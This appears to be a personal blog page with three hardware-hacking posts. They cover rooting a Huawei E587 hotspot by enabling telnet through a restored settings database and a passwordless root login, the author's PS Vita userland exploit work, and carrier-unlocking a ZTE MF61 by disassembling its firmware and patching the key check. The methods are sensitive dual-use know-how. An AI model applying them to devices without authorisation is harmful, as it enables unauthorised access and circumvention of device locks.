Earlier this year, I got my hands on the T-Mobile 4G Sonic Hotspot and as always, had to tear it apart as soon as I got it. I never wrote about it because I didn’t find anything overly interesting, but now it’s the end of the year, and I need to clear some inventory from my brain. If anyone remembers my post on the (older) T-Mobile 4G Hotspot (sans “Sonic”), the main limitation of that device was that the processor is an obscure one that required some digging to get information on. Thankfully, the Sonic variety is much easier to break into.

Teardown

I don’t usually do this, but as I couldn’t find any good snapshots of the insides of this device, I took it upon myself to produce some amateur shots. One thing I want to say about the insides is that I loved how the main board is broken into three parts and they’re sandwiched together to make the device small (but thick).

Device with faceplate removed.

Device with faceplate removed.

MCIMX283CVM4B

FreeScale MCIMX283CVM4B

Qualcomm MDM8220 modem

Qualcomm MDM8220 modem

Middle layer, containing various chips

Middle layer, containing various chips

The important information is that the device is ARM based (it even uses the same system-on-chip as older Kindles), and having a well documented SoC is always a plus. There isn’t an obvious debug serial port, but I would bet that there is one knowing how the FreeScale SoCs work. However, we don’t need to explore hardware hacking yet as the software is unexplored.

Rooting

This was literally the easiest device I’ve ever rooted. I can honestly say that from opening the package (knowing nothing about the device) to getting a root shell took me about fifteen minutes. There was only one interface to the device and that’s the management webpage. My plan was to explore every location where I could pass input to the device (settings, HTTP POST requests, MicroSD file browser, etc) and basically just try things until I get a crash or something interesting. The first thing I’ve tried was the settings backup/restore feature. Creating a backup of the settings allows you to download a SQLite database containing the settings. A quick SQL dump of the settings showed me some interesting options that can’t be set directly from the web interface, including:

CREATE TABLE telnet
(
TelnetStatus int
);

Yep, setting TelnetStatus to 1 and restoring the backup database showed me that port 23 was now open from the hotspot’s IP. Well, that was extremely lucky, as always the best hacks are the one which doesn’t require hacking at all. Well that was only half the challenge, the next part is getting access to the root account. I’m thinking everything from brute forcing passwords to looking at privilege escalation exploits but all of that disappeared as soon as I typed “root” and enter because there was no password prompt. That’s right, “root” doesn’t require a password. I did a quick inventory of the filesystem and found the block devices, and using the magic of dd, nc, and the old Unix pipe, quickly dumped all the filesystems.

Software

Here’s the thing though, I spent all this time (almost 45 minutes at this point!) rooting the device and I don’t even have a clear goal. I don’t need to unlock the device because I was a T-Mobile customer at that point, and I didn’t really want to make a pocket ARM computer/server (which would be a thing one can do with this), so I just did a quick scan of how the device works (curiosity is the best excuse) and went my way. Here’s some of the things I’ve discovered, use this information how you will.

First of all, the device runs a stripped down build of Android running “Linux version 2.6.31 (e5@e587) (gcc version 4.4.0 (GCC) ) #1 Sun Aug 28 02:25:47 CST 2011.” On startup, most of the vanilla Android processes (including adbd) are not started, but instead the Qualcomm modem driver, some pppd/networking daemons, and a custom software they call “cms” are started. “cms” makes sure stuff like their custom httpd (which is hard coded to allow the HTML portal site to perform functions on the hotspot) and power management and the OLED display are running and in good status. The Huawi device stores all data on its flash MTD device. From a quick analysis (aka, might be errors), block 0 contains the u-boot bootloader (in what I believe is a format dictated by FreeScale), block 3 contains the kernel (gzipped with a custom header, possible also dictated by FreeScale), block 4 contains the rootfs (also gzipped with a custom header) loaded with boot scripts and busybox, block 5 is Android’s /system which also contains the main binaries (like cms, httpd) and the HTML pages, block 6 is Android’s /data which is empty, block 8 maps to /mnt/backup which I believe is, as the name says, just backups, block 12 maps to /mnt/flash which I believe is where ephemeral data like logs are and also where the settings are stored, and block 13 maps to /mnt/cdrom which has Huewai’s software and drivers for connecting to the computer with (and you see it when you plug the device into your computer).

That’s a quick summary of some of the things I’ve found while poking around this device. Nothing interesting (unless you’re a Huawei E587 fanatic I guess), but I’m sure there’s someone, someday, who got here from Google.

PlayStation Vita: the progress and the plan

Sorry that it’s been a while since I’ve said anything about the Vita. I was caught by surprise the last time of all the media attention from just a simple call for help. While I still don’t want to say too much right now, I do want to answer some common questions I’ve been getting and also go over what needs to be done.

If this is news to you, please read this interview I’ve done a while ago about it.

Did you hack the Vita? That’s a very vague question. What I have done, is run native code on the Vita with the same permissions as the game being exploited. This means I can load homebrews written and optimized for the Vita’s CPU and take full advantage of the CPU speed and RAM (unlike the PSP emulator or PSM, both impose artificial limits on resources and system functions). What has NOT been done (yet) is unlocking the system completely for tasks like USB interfacing, custom themes/system mods/plugins, and (fortunately) pirating games.

What’s UVLoader and how far along is it? The last I’ve spoken, I was beginning work on UVL and asked for any help I could get. Even though, I did not really get help, I did find people who were interested in what I was doing and we exchanged information. I also want to brag that I finished the main functionalities of UVL in a couple of weeks, and it has been “done” for about three months now. (Quotes around “done” because I decided to not worry about some features yet). That means, I can basically load most (most being the few that I manually built without an open sdk) compiled homebrews. You can run your standard hello worlds and spinning cubes and such, but in theory, it should load any homebrew built.

When’s the release? What’s taking so long? So as I’ve said, the loader was done three months ago. I have a couple of reasons for not releasing yet. The main reason is that currently, there is no open SDK for compiling and linking Vita homebrew like pspsdk did for the PSP. That means, even with the loader, it would be useless for users because there are no homebrew games, emulators, etc to run, and it would be useless for developers because they can’t build homebrews either. So what’s the progress on the open sdk? Zero, as I’m typing this right now. I have an idea of what it should look like and I spoke to a couple of people who are interested in helping, but so far, no code is written. Why is that? Because for me, I am very busy with lots of other unrelated things, and unfortunately, only me and a handful of other people know enough about the device and the executable format and etc to make the open sdk and none of us have the time currently.

The second reason is that having a Vita exploit at this stage (when it is really hard to find exploits) is very rare if not a once in a lifetime thing. Me and others I’ve talked to agree that right now it’s more important to use this exploit to gather more information about the system in order to find more exploits and such than it is to run homebrews right now. We have PSM for homebrew games and PSP emulator for homebrew emulators, so there really isn’t a huge demand for native PSVita homebrews yet. As I’ll expand on below, we’ve only scratched the surface of Vita hacking and there’s so much more to see.

Are you looking for testers/can I test UVLoader? There’s no need to “test” UVLoader right now because, as I’ve stated before, there isn’t any compiled homebrew and nothing to compile them anyways. Yes, UVL works with some of the custom still I’ve built manually, but it is unwise to write complex stuff without a working SDK.

Can help? Depends who you are. If you’re an established reverse engineer, you know how to contact me. If you just want to “beta test,” read above. If you know any other way of helping me, don’t ask, just do it™, since UVL is open source. Even though I don’t accept monetary donations before I release anything, if you have access to broken Vitas, memory cards, games, etc, or any unused hardware reversing tools like logic analyzers; anything you wouldn’t mind parting with, one of the things me and others involved don’t have access to is funds for materials to test some of the more… risky ideas and if you could help with that respect, just use the contact link at the top of the page to get in touch with me.

What needs to be done to “hack” the Vita? Again, that term is very vague, but I know what you mean. This is the perfect time to describe (as far as I know) the Vita’s security structure and what needs to be done at each level.

PSP emulator

I’ll start with the PSP emulator just because that is what’s “hacked” right now. How much control do you have of the Vita when you use vHBL? Almost none. On the PSP itself, games are “sandboxed” (meaning some other process tells it what functions of the PSP can be used by the current game, main thing being that one game can’t load another game). Because the Vita emulates the PSP, it also emulates this structure.

PSP kernel

One level up, we have “kernel exploits” on the PSP, which means that we are no longer limited to what functions of the PSP we can use. Any PSP function that is emulated by the Vita can be used, that’s why you see ISO loading as the main thing. However, all of this, the PSP emulator, sits in the Vita game sandbox. This sandbox is just like the PSP one, in that another Vita process tells the game (in this case, the PSP emulator running some PSP game) what Vita functions can be used in a similar fashion. For example, if a game doesn’t explicitly declare that it’s going to use the camera or bluetooth (and Sony approves), any code that tries to use these functions will crash.

Vita userland

This is where UVLoader works; we exploited some game to run code inside it’s sandbox, meaning that if that game doesn’t have camera functions, no UVLoader Vita homebrew can use the camera either. This also means, of course, we can’t load pirated Vita games and so on. A fun fact here is that, in theory, if someone finds an exploit in Kermit, the system inside the PSP emulator that talks to the Vita through a virtual serial port, they can run UVLoader in the process hosting the emulator (one level higher than a PSP kernel exploit), meaning they may be able to modify the emulator to have more RAM or faster CPU or etc. Another advantage of running UVLoader here is that because the PSP emulator has access to more Vita hardware than most games (bluetooth, camera, etc), homebrews could have more access too.

However, it’s easier said than done. It’s hard to appreciate  how hard it is to get a Vita userland exploit. Let’s work backwards: we want to somehow run native ARM code, how? Well, the classic route is some stack smash. But wait, modern ARM processors have XN (eXecute Never), which is a feature that only allow code in memory to run at specific locations (these locations are determined by the kernel and are read only). Ok, we have some other choices here: heap overflows, ROP (google if you don’t know), and so on (assuming you even know you got a working exploit, which in itself is hard to know without additional information; most “crashes” are useless), but all of these choices require that you know enough about the system to create a payload fitted for the system. That means, you need either a memory sniffer or somehow dump the memory. Well, let’s rule out hardware memory sniffing since the Vita has the RAM on the same system-on-a-chip as the CPU. How do we dump the memory then? Usually, you need to run some code to dump the memory or do some kind of oracle attack on crashes or error messages or something. Option one only works if we hacked the system before, and the second one, AFAIK, won’t work because the Vita doesn’t give any information when it crashes. So how did I get the first userland exploit? I’ll leave that as an exercise to the reader…

Vita kernel (lv2?)

Vita userland is the most we have access right now and PSP kernel mode is the most that is public. What comes after? Remember all information at this point could be wrong and is based off of the little evidence I have currently. We are in the Vita sandbox right now, which means we can run homebrew, but we can’t use functions that the game doesn’t use (camera, bluetooth, USB, etc). We also can’t modify the system (run Linux, change the theme, add plugins, etc). For those to work, we need to go one level up: the Vita kernel, which might be called lv2. Even with complete userland access, we can’t even poke at the kernel. The kernel acts like a black box, providing functions to the system through syscalls. You pass input into these syscalls and it returns some output, without revealing how the output is created. The kernel’s memory is separate from userland obviously, and even guessing what syscalls do (there’s no names in the memory, only numbers) is a challenge. In order to hack the kernel, we have a problem that is very much like the one I’ve stated above about getting Vita userland, except with even more limitations. Again, there’s the circular problem of needing a kernel RAM dump to inspect for exploits and requiring a kernel exploit to dump the RAM. Now, there’s even less “places” to inspect (visually and programmatically). In order of likelihood, one of the following needs to happen before there’s even a CHANCE of a kernel exploit: 1) Sony does something stupid like the PS3 keys leak, 2) we get REALLY lucky and basically stumble upon an exploit by just testing one of the several hundreds of syscalls with one of an infinite amount of different inputs, 3) some information leaks out from Sony HQ.

It’s still unknown how much control we would have if kernel mode is compromised, but me and some others think that we MAY at least be able to do something like a homebrew enabler (HEN) that patches signature checks temporarily until reboot, allowing for homebrews with no sandbox limitations (access to camera, BT, etc) and POSSIBILITY system plugins and themes. It is very unlikely at any keys will be found at this point or being able to create or run a CFW.

Hypervisor? (lv1?)

At this point, it is purely a thought experiment, as we literally have no information beyond what we THINK the kernel does. It is highly possible that there is a hypervisor that makes sure everything running is signed and the kernel isn’t acting up and such. Getting to this would be EVEN HARDER than getting kernel, which I already think is impossible. Even at kernel, it seems to be over my skill limit, but this would definitely be above me, and someone with real skills would have to attack this. I’m thinking at least, decaps will have to be attempted here. If somehow this gets hacked, we may be able to run CFWs, but like the PS3 before the lv0, newer firmwares would not be able to be CFW’d until…

Bootloader? (lv0?)

Again, only conjecture at this point, but this is the holy grail, the final boss. Once this is compromised, the Vita would be “hacked” in every sense of the word. We may never get here (and by never, I mean maybe 5-10 years, but I would most likely not be working on the Vita at this point). Here’s is where I think the keys are stored. With this compromised, CFW of any past, present, or future firmwares could be created, and anything would be possible.

Summary

I guess to summarize, the reason there’s no release in the foreseeable future isn’t just because I don’t have time to make an sdk so there won’t be homebrews to use even if UVL is released. Even if the SDK does get done, at this point, it would be more attractive to use the control we currently have, double down, and try to get more control. If the exploit is revealed prematurely, getting the game pulled, and the firmware patched, sure we may get a fast N64 emulator in a couple of months when somebody has the chance to write it (and at that point, most people might be enticed to upgrade anyways for new firmware features and PSN access), but we will have to start at square one (read above about finding userland exploits) before having another chance at exploring the full potential of the system. Deep down, I am a researcher, and would have more interest in reversing the system than I would at making a release for users just so I could be the “first”. Like all gambles, I may end up with nothing, but that’s a risk I’m willing to take.

Unlocking T-Mobile 4G Hotspot (ZTE MF61): A case study

So, I have one of these MiFi clone from T-Mobile and want to unlock it to use on AT&T (I know that AT&T 4G/3G isn’t supported, but I thought maybe I could fix that later). The first thing I tried to do was contact T-Mobile, as they are usually very liberal concerning unlock codes. However, this time, T-Mobile (or, as they claim, the manufacture) isn’t so generous. So I’ve decided to take it upon myself to do it. I will write down the entire procedure here as a case study on how to “reverse engineer” a new device. However, in no way do I consider myself an expert, so feel free to bash me in the comments on what I did wrong. Also, I have decided against releasing any binaries or patches because phone unlocking is a grey area (although it is legal here), but if you read along you should be able to repeat what I did, even though I will also try to generalize.

Getting information

The hardest part of any hack is the figuring-out-how-to-start phase. That’s always tricky. But… let the games begin.

-Wheatley, Portal 2

So before we can do anything, we need to know what to do. The best place to begin is to look at the updater. A quick look at the extracted files, we find that the files being flashed have names such as “amss.mbn”, “dsp1.mbn”, and such. A quick scan with a hex editor, we see that the files are unencrypted and unsigned. That’s good news because it means we have the ability to change the code. A quick Google search shows us that these files are firmware files for Qualcomm basebands. Now, we need to find more information on this Qualcomm chip. You may try some more Google-fu, but I took another path and took apart the device (not recommended if it’s any more complicated). In this case, I found that we are dealing with a Qualcomm MDM8200A device. Google that and you’ll find more information such as there are two DSP processors for the modem and on “apps” ARM processor (presumably for T-Mobile’s custom firmare, and is what you see as the web interface). We want to unlock the device, so I assume the work is done in the DSP processor. That’s the first problem. QDSP6 (I found this name through more Google skills) is not a supported processor in IDA Pro, my go-to tool, so we need another way to disassemble it.

Disassembly

Some more Googling (I’m sure you can see a pattern on how this works now) leads me to this. QDSP6 is actually called “Hexagon” by Qualcomm and they kindly provided an EBI and programmer’s guide. I guessed from the documents that there is a toolchain, but no more information is provided about it. More searching lead me to believe that the in-house toolchain is proprietary, but luckily, there is an open source implementation that is being worked on. Having the toolchain means that we can use “objdump”, the 2nd most popular disassembly tool [Citation Needed]. So, it’s just a matter of sending dsp1.mbn and dsp2.mbn into objdump -x? Nope. It seems that our friends at ZTE either purposely or automatically (as part of the linker) stripped the “section headers” of the ELF file. I did a quick read of the ELF specifications and found that the “section headers” are not required for the program to run, but provides information for linking and such. What we did have was the “program headers”, which is sort of a stripped down version of the section headers. (Program headers only tell: 1) where each “section” is located in file and where to load it in memory, 2) is it program or data?, 3) readable? writable?, while section headers give more information like the name of each section and more on what the program/data section’s purpose is). What I then did is wrote my own section headers using the program headers as a guide and made up the names and other information (because they are not used in the actual disassembling anyways) with a hex editor. Then I pasted my headers into the file, changed some offsets, and objdump -x surrendered the assembly code. 180MB worth of it.

Assembly

So we have 180MB worth of code written in a language that could very well be greek. Luckily, as I’ve mentioned earlier, Qualcomm released a document detailing the QDSP assembly language and how it’s used. Most likely, you would be dealing with a more “popular” processor like ARM or x86 and would have access to more resources. However, for QDSP6/Hexagon, we have two PDF documents and that is basically the Bible that we need to memorize. I then spend a couple of hours learning this new assembly language (assembly isn’t that hard once you embrace it) and figured out the basics needed to reverse engineer (that is: jumps, store/loads, and arithmetic). Now, another problem arises. We have literally 3 million lines of assembly code with no function names, no symbols, and no “sections”. How do we find where the goal (the function that checks the NCK key and unlocks the device accordantly) without spending the next two years decoding this mess? Here, we need to do some assumptions. First, we know   (through Google) that the AT modem command for inputting the NCK key is AT+ZNCK=”keyhere” for ZTE devices. So, let’s look for “ZNCK” in the hex editor of dsp1.mbn and dsp2.mbn. (If you are not as lucky and don’t know what the AT command is, I would put money that the command will contain the word NCK, so just search that). In dsp2.mbn, we find a couple of results. One of the results is in a group of other AT commands. Each command is next to a 4-byte hex value and a bunch of zero padding. I would guess that it is a jump table and the hex values are the memory locations of the functions to jump to. Doing a quick memory to file offset conversion (from our ELF program header), we locate the offset in our disassembly dump to find that it starts an “allocframe” instruction. That means we are at the beginning of a function so our assumptions must be right. Now, we can get to the crux of the problem, which is figuring out how the keycheck works.

Mapping out the functions

We now know where the function of interest starts, but we don’t know where it ends. It’s easy to find out though, look for a jump to lr (in this case for this processor, it’s a instruction to jump r31). We start at the beginning of the function and we copy all the instruction until we see a non-conditional jump. We paste the data into another text file (for easier reference). Then we go to the next location in the disassembly (where it would have jumped to) and copy the instruction until we see another non-conditional jump, and then paste them into the second text file. Keep doing this until you see a jump to r31. We now have most of the function. Notice I kept saying “non-conditional” jumps. That’s because first, we just need the code that ALWAYS runs, just to filter out stuff we don’t need. Now, we should get the other branches just so we have more information. To do this, just follow each jump or function call in the same way as we did for the main function. I would also recommend writing some labels like “branch1″ and “func1″ for each jump just so you can easily locate two jumps to the same location and such. I would also recommend only doing this up to three “levels” max (three function calls or three jumps) because it could get real messy real quick, and we will need more information so we can filter out un-needed code, as I will detail in the next section.

Finding data references

Right now, we are almost completely blind. All we know is what code is run. We don’t know the names of functions or what they do, and it would take forever to “map” every function and every function every function calls (and so on). So we need to obtain some information. The best would be to see what data the code is using. For this processor (and likely many others), a “global pointer” is used to refer to some constant data. So, look for references to “gp” in the disassembly. Searching from the very beginning of the program, we find that the global pointer is set to 0x3500000, and according to the ELF headers, that is a section of the dsp2.mbn file at some file offset. In the section we care about, look for references to “gp” and use the offsets you find to locate the data they refer to. I would recommend adding some comments about them in the code so we don’t forget about them. Now, the global pointer isn’t everything, we can have regular hard-coded pointers to constant areas of memory. Look for setting of registers to large numbers. These are likely parameters to function calls that are too big to be just numerical data and are more likely pointers. Use the ELF header to translate the memory locations to file offsets. In this case (for this processor), some values may be split into rS.h and rS.l, these are memory locations that are too “large” to be set in the register at once. Just convert rS.h into a 16 bit integer, rS.l into a 16 bit integer (both might require zero padding in front), then combine them into one 32 bit integer where rS.h’s value is in front of rS.l’s value. For example, we have: r1.h = #384; r1.l = #4624. That will make r1 == 0x1801210. You should also make some comments in the code about the data that is being used. Now, predict standard library calls. This may be the hardest step because it involves guessing and incorrect guessing may make other guess more wrong. You don’t have much information to go by, but you know 1) the values of some of the data being passed into function calls, and 2) library calls will usually be near the start of the program, or at least very far away from the current function. This will be harder if the function you are trying to map is already near the beginning of the program. The function I’m mapping is found at 0xf84c54, and most function calls are close to it. When I see a function call to 0xb02760, I know that it might be a library call. 3) Some of the more “common” functions and the types of parameters they accept. You don’t need to figure out all of the library calls, just enough to get an idea of what the code is doing so you don’t try to map out these functions (trying to map out strcpy, for example will get messy real quick). For example, one function call, I see is taking in a data pointer from a “gp” offset, a string that contains “%s: %d”, and some more data. I will assume it is calling fprintf(). I see another function is being called many times throughout the code, and it always accepts two pointers where the second one may be a constant and a number. I will assume it is calling memcpy().

Translating

This may be the most boring part. You should have enough information now to try to write a higher language code that does what the assembly code says. I would recommend doing this because it is much easier to see logic this way. I used C and started by doing a “literal” transcription using stuff like “r0-r31″ as variable names and using goto. Then go back and try to simplify each section. In my process, I found that how the unlock key is checked is though sort of a hash function. It takes the user input, passes it through a huge algorithm of and/or/add/sub of more than 1000 lines and takes the result and compares it to a hard coded value in the NV ram (storage area for the device). Here, I made a choice to not go through and re-code this algorithm for two reasons. First, it would be of little use, as the key check doesn’t use a known value like the IMEI and relies on a hard coded value in the NV ram that you need to extract (which a regular user might have trouble doing). Second, after decoding it, we would have to do the algorithm backwards to find the key from the “known value” in the NV ram (and it could be that it would be impossible to work backwards). So I took the easy way out and made a 4-byte patch in where I let the program compare the known value to itself instead of to the generated hash from the input and flashed it to the device. Then I inputted a random key, and the device was unlocked.

Now, remember at the beginning I said the code was unsigned? Because of that I could easily have reflashed the firmware with my “custom” code. However, if your device has some way of preventing modified code from running, you may have no choice but to decode the algorithm.

Page 1 of 41234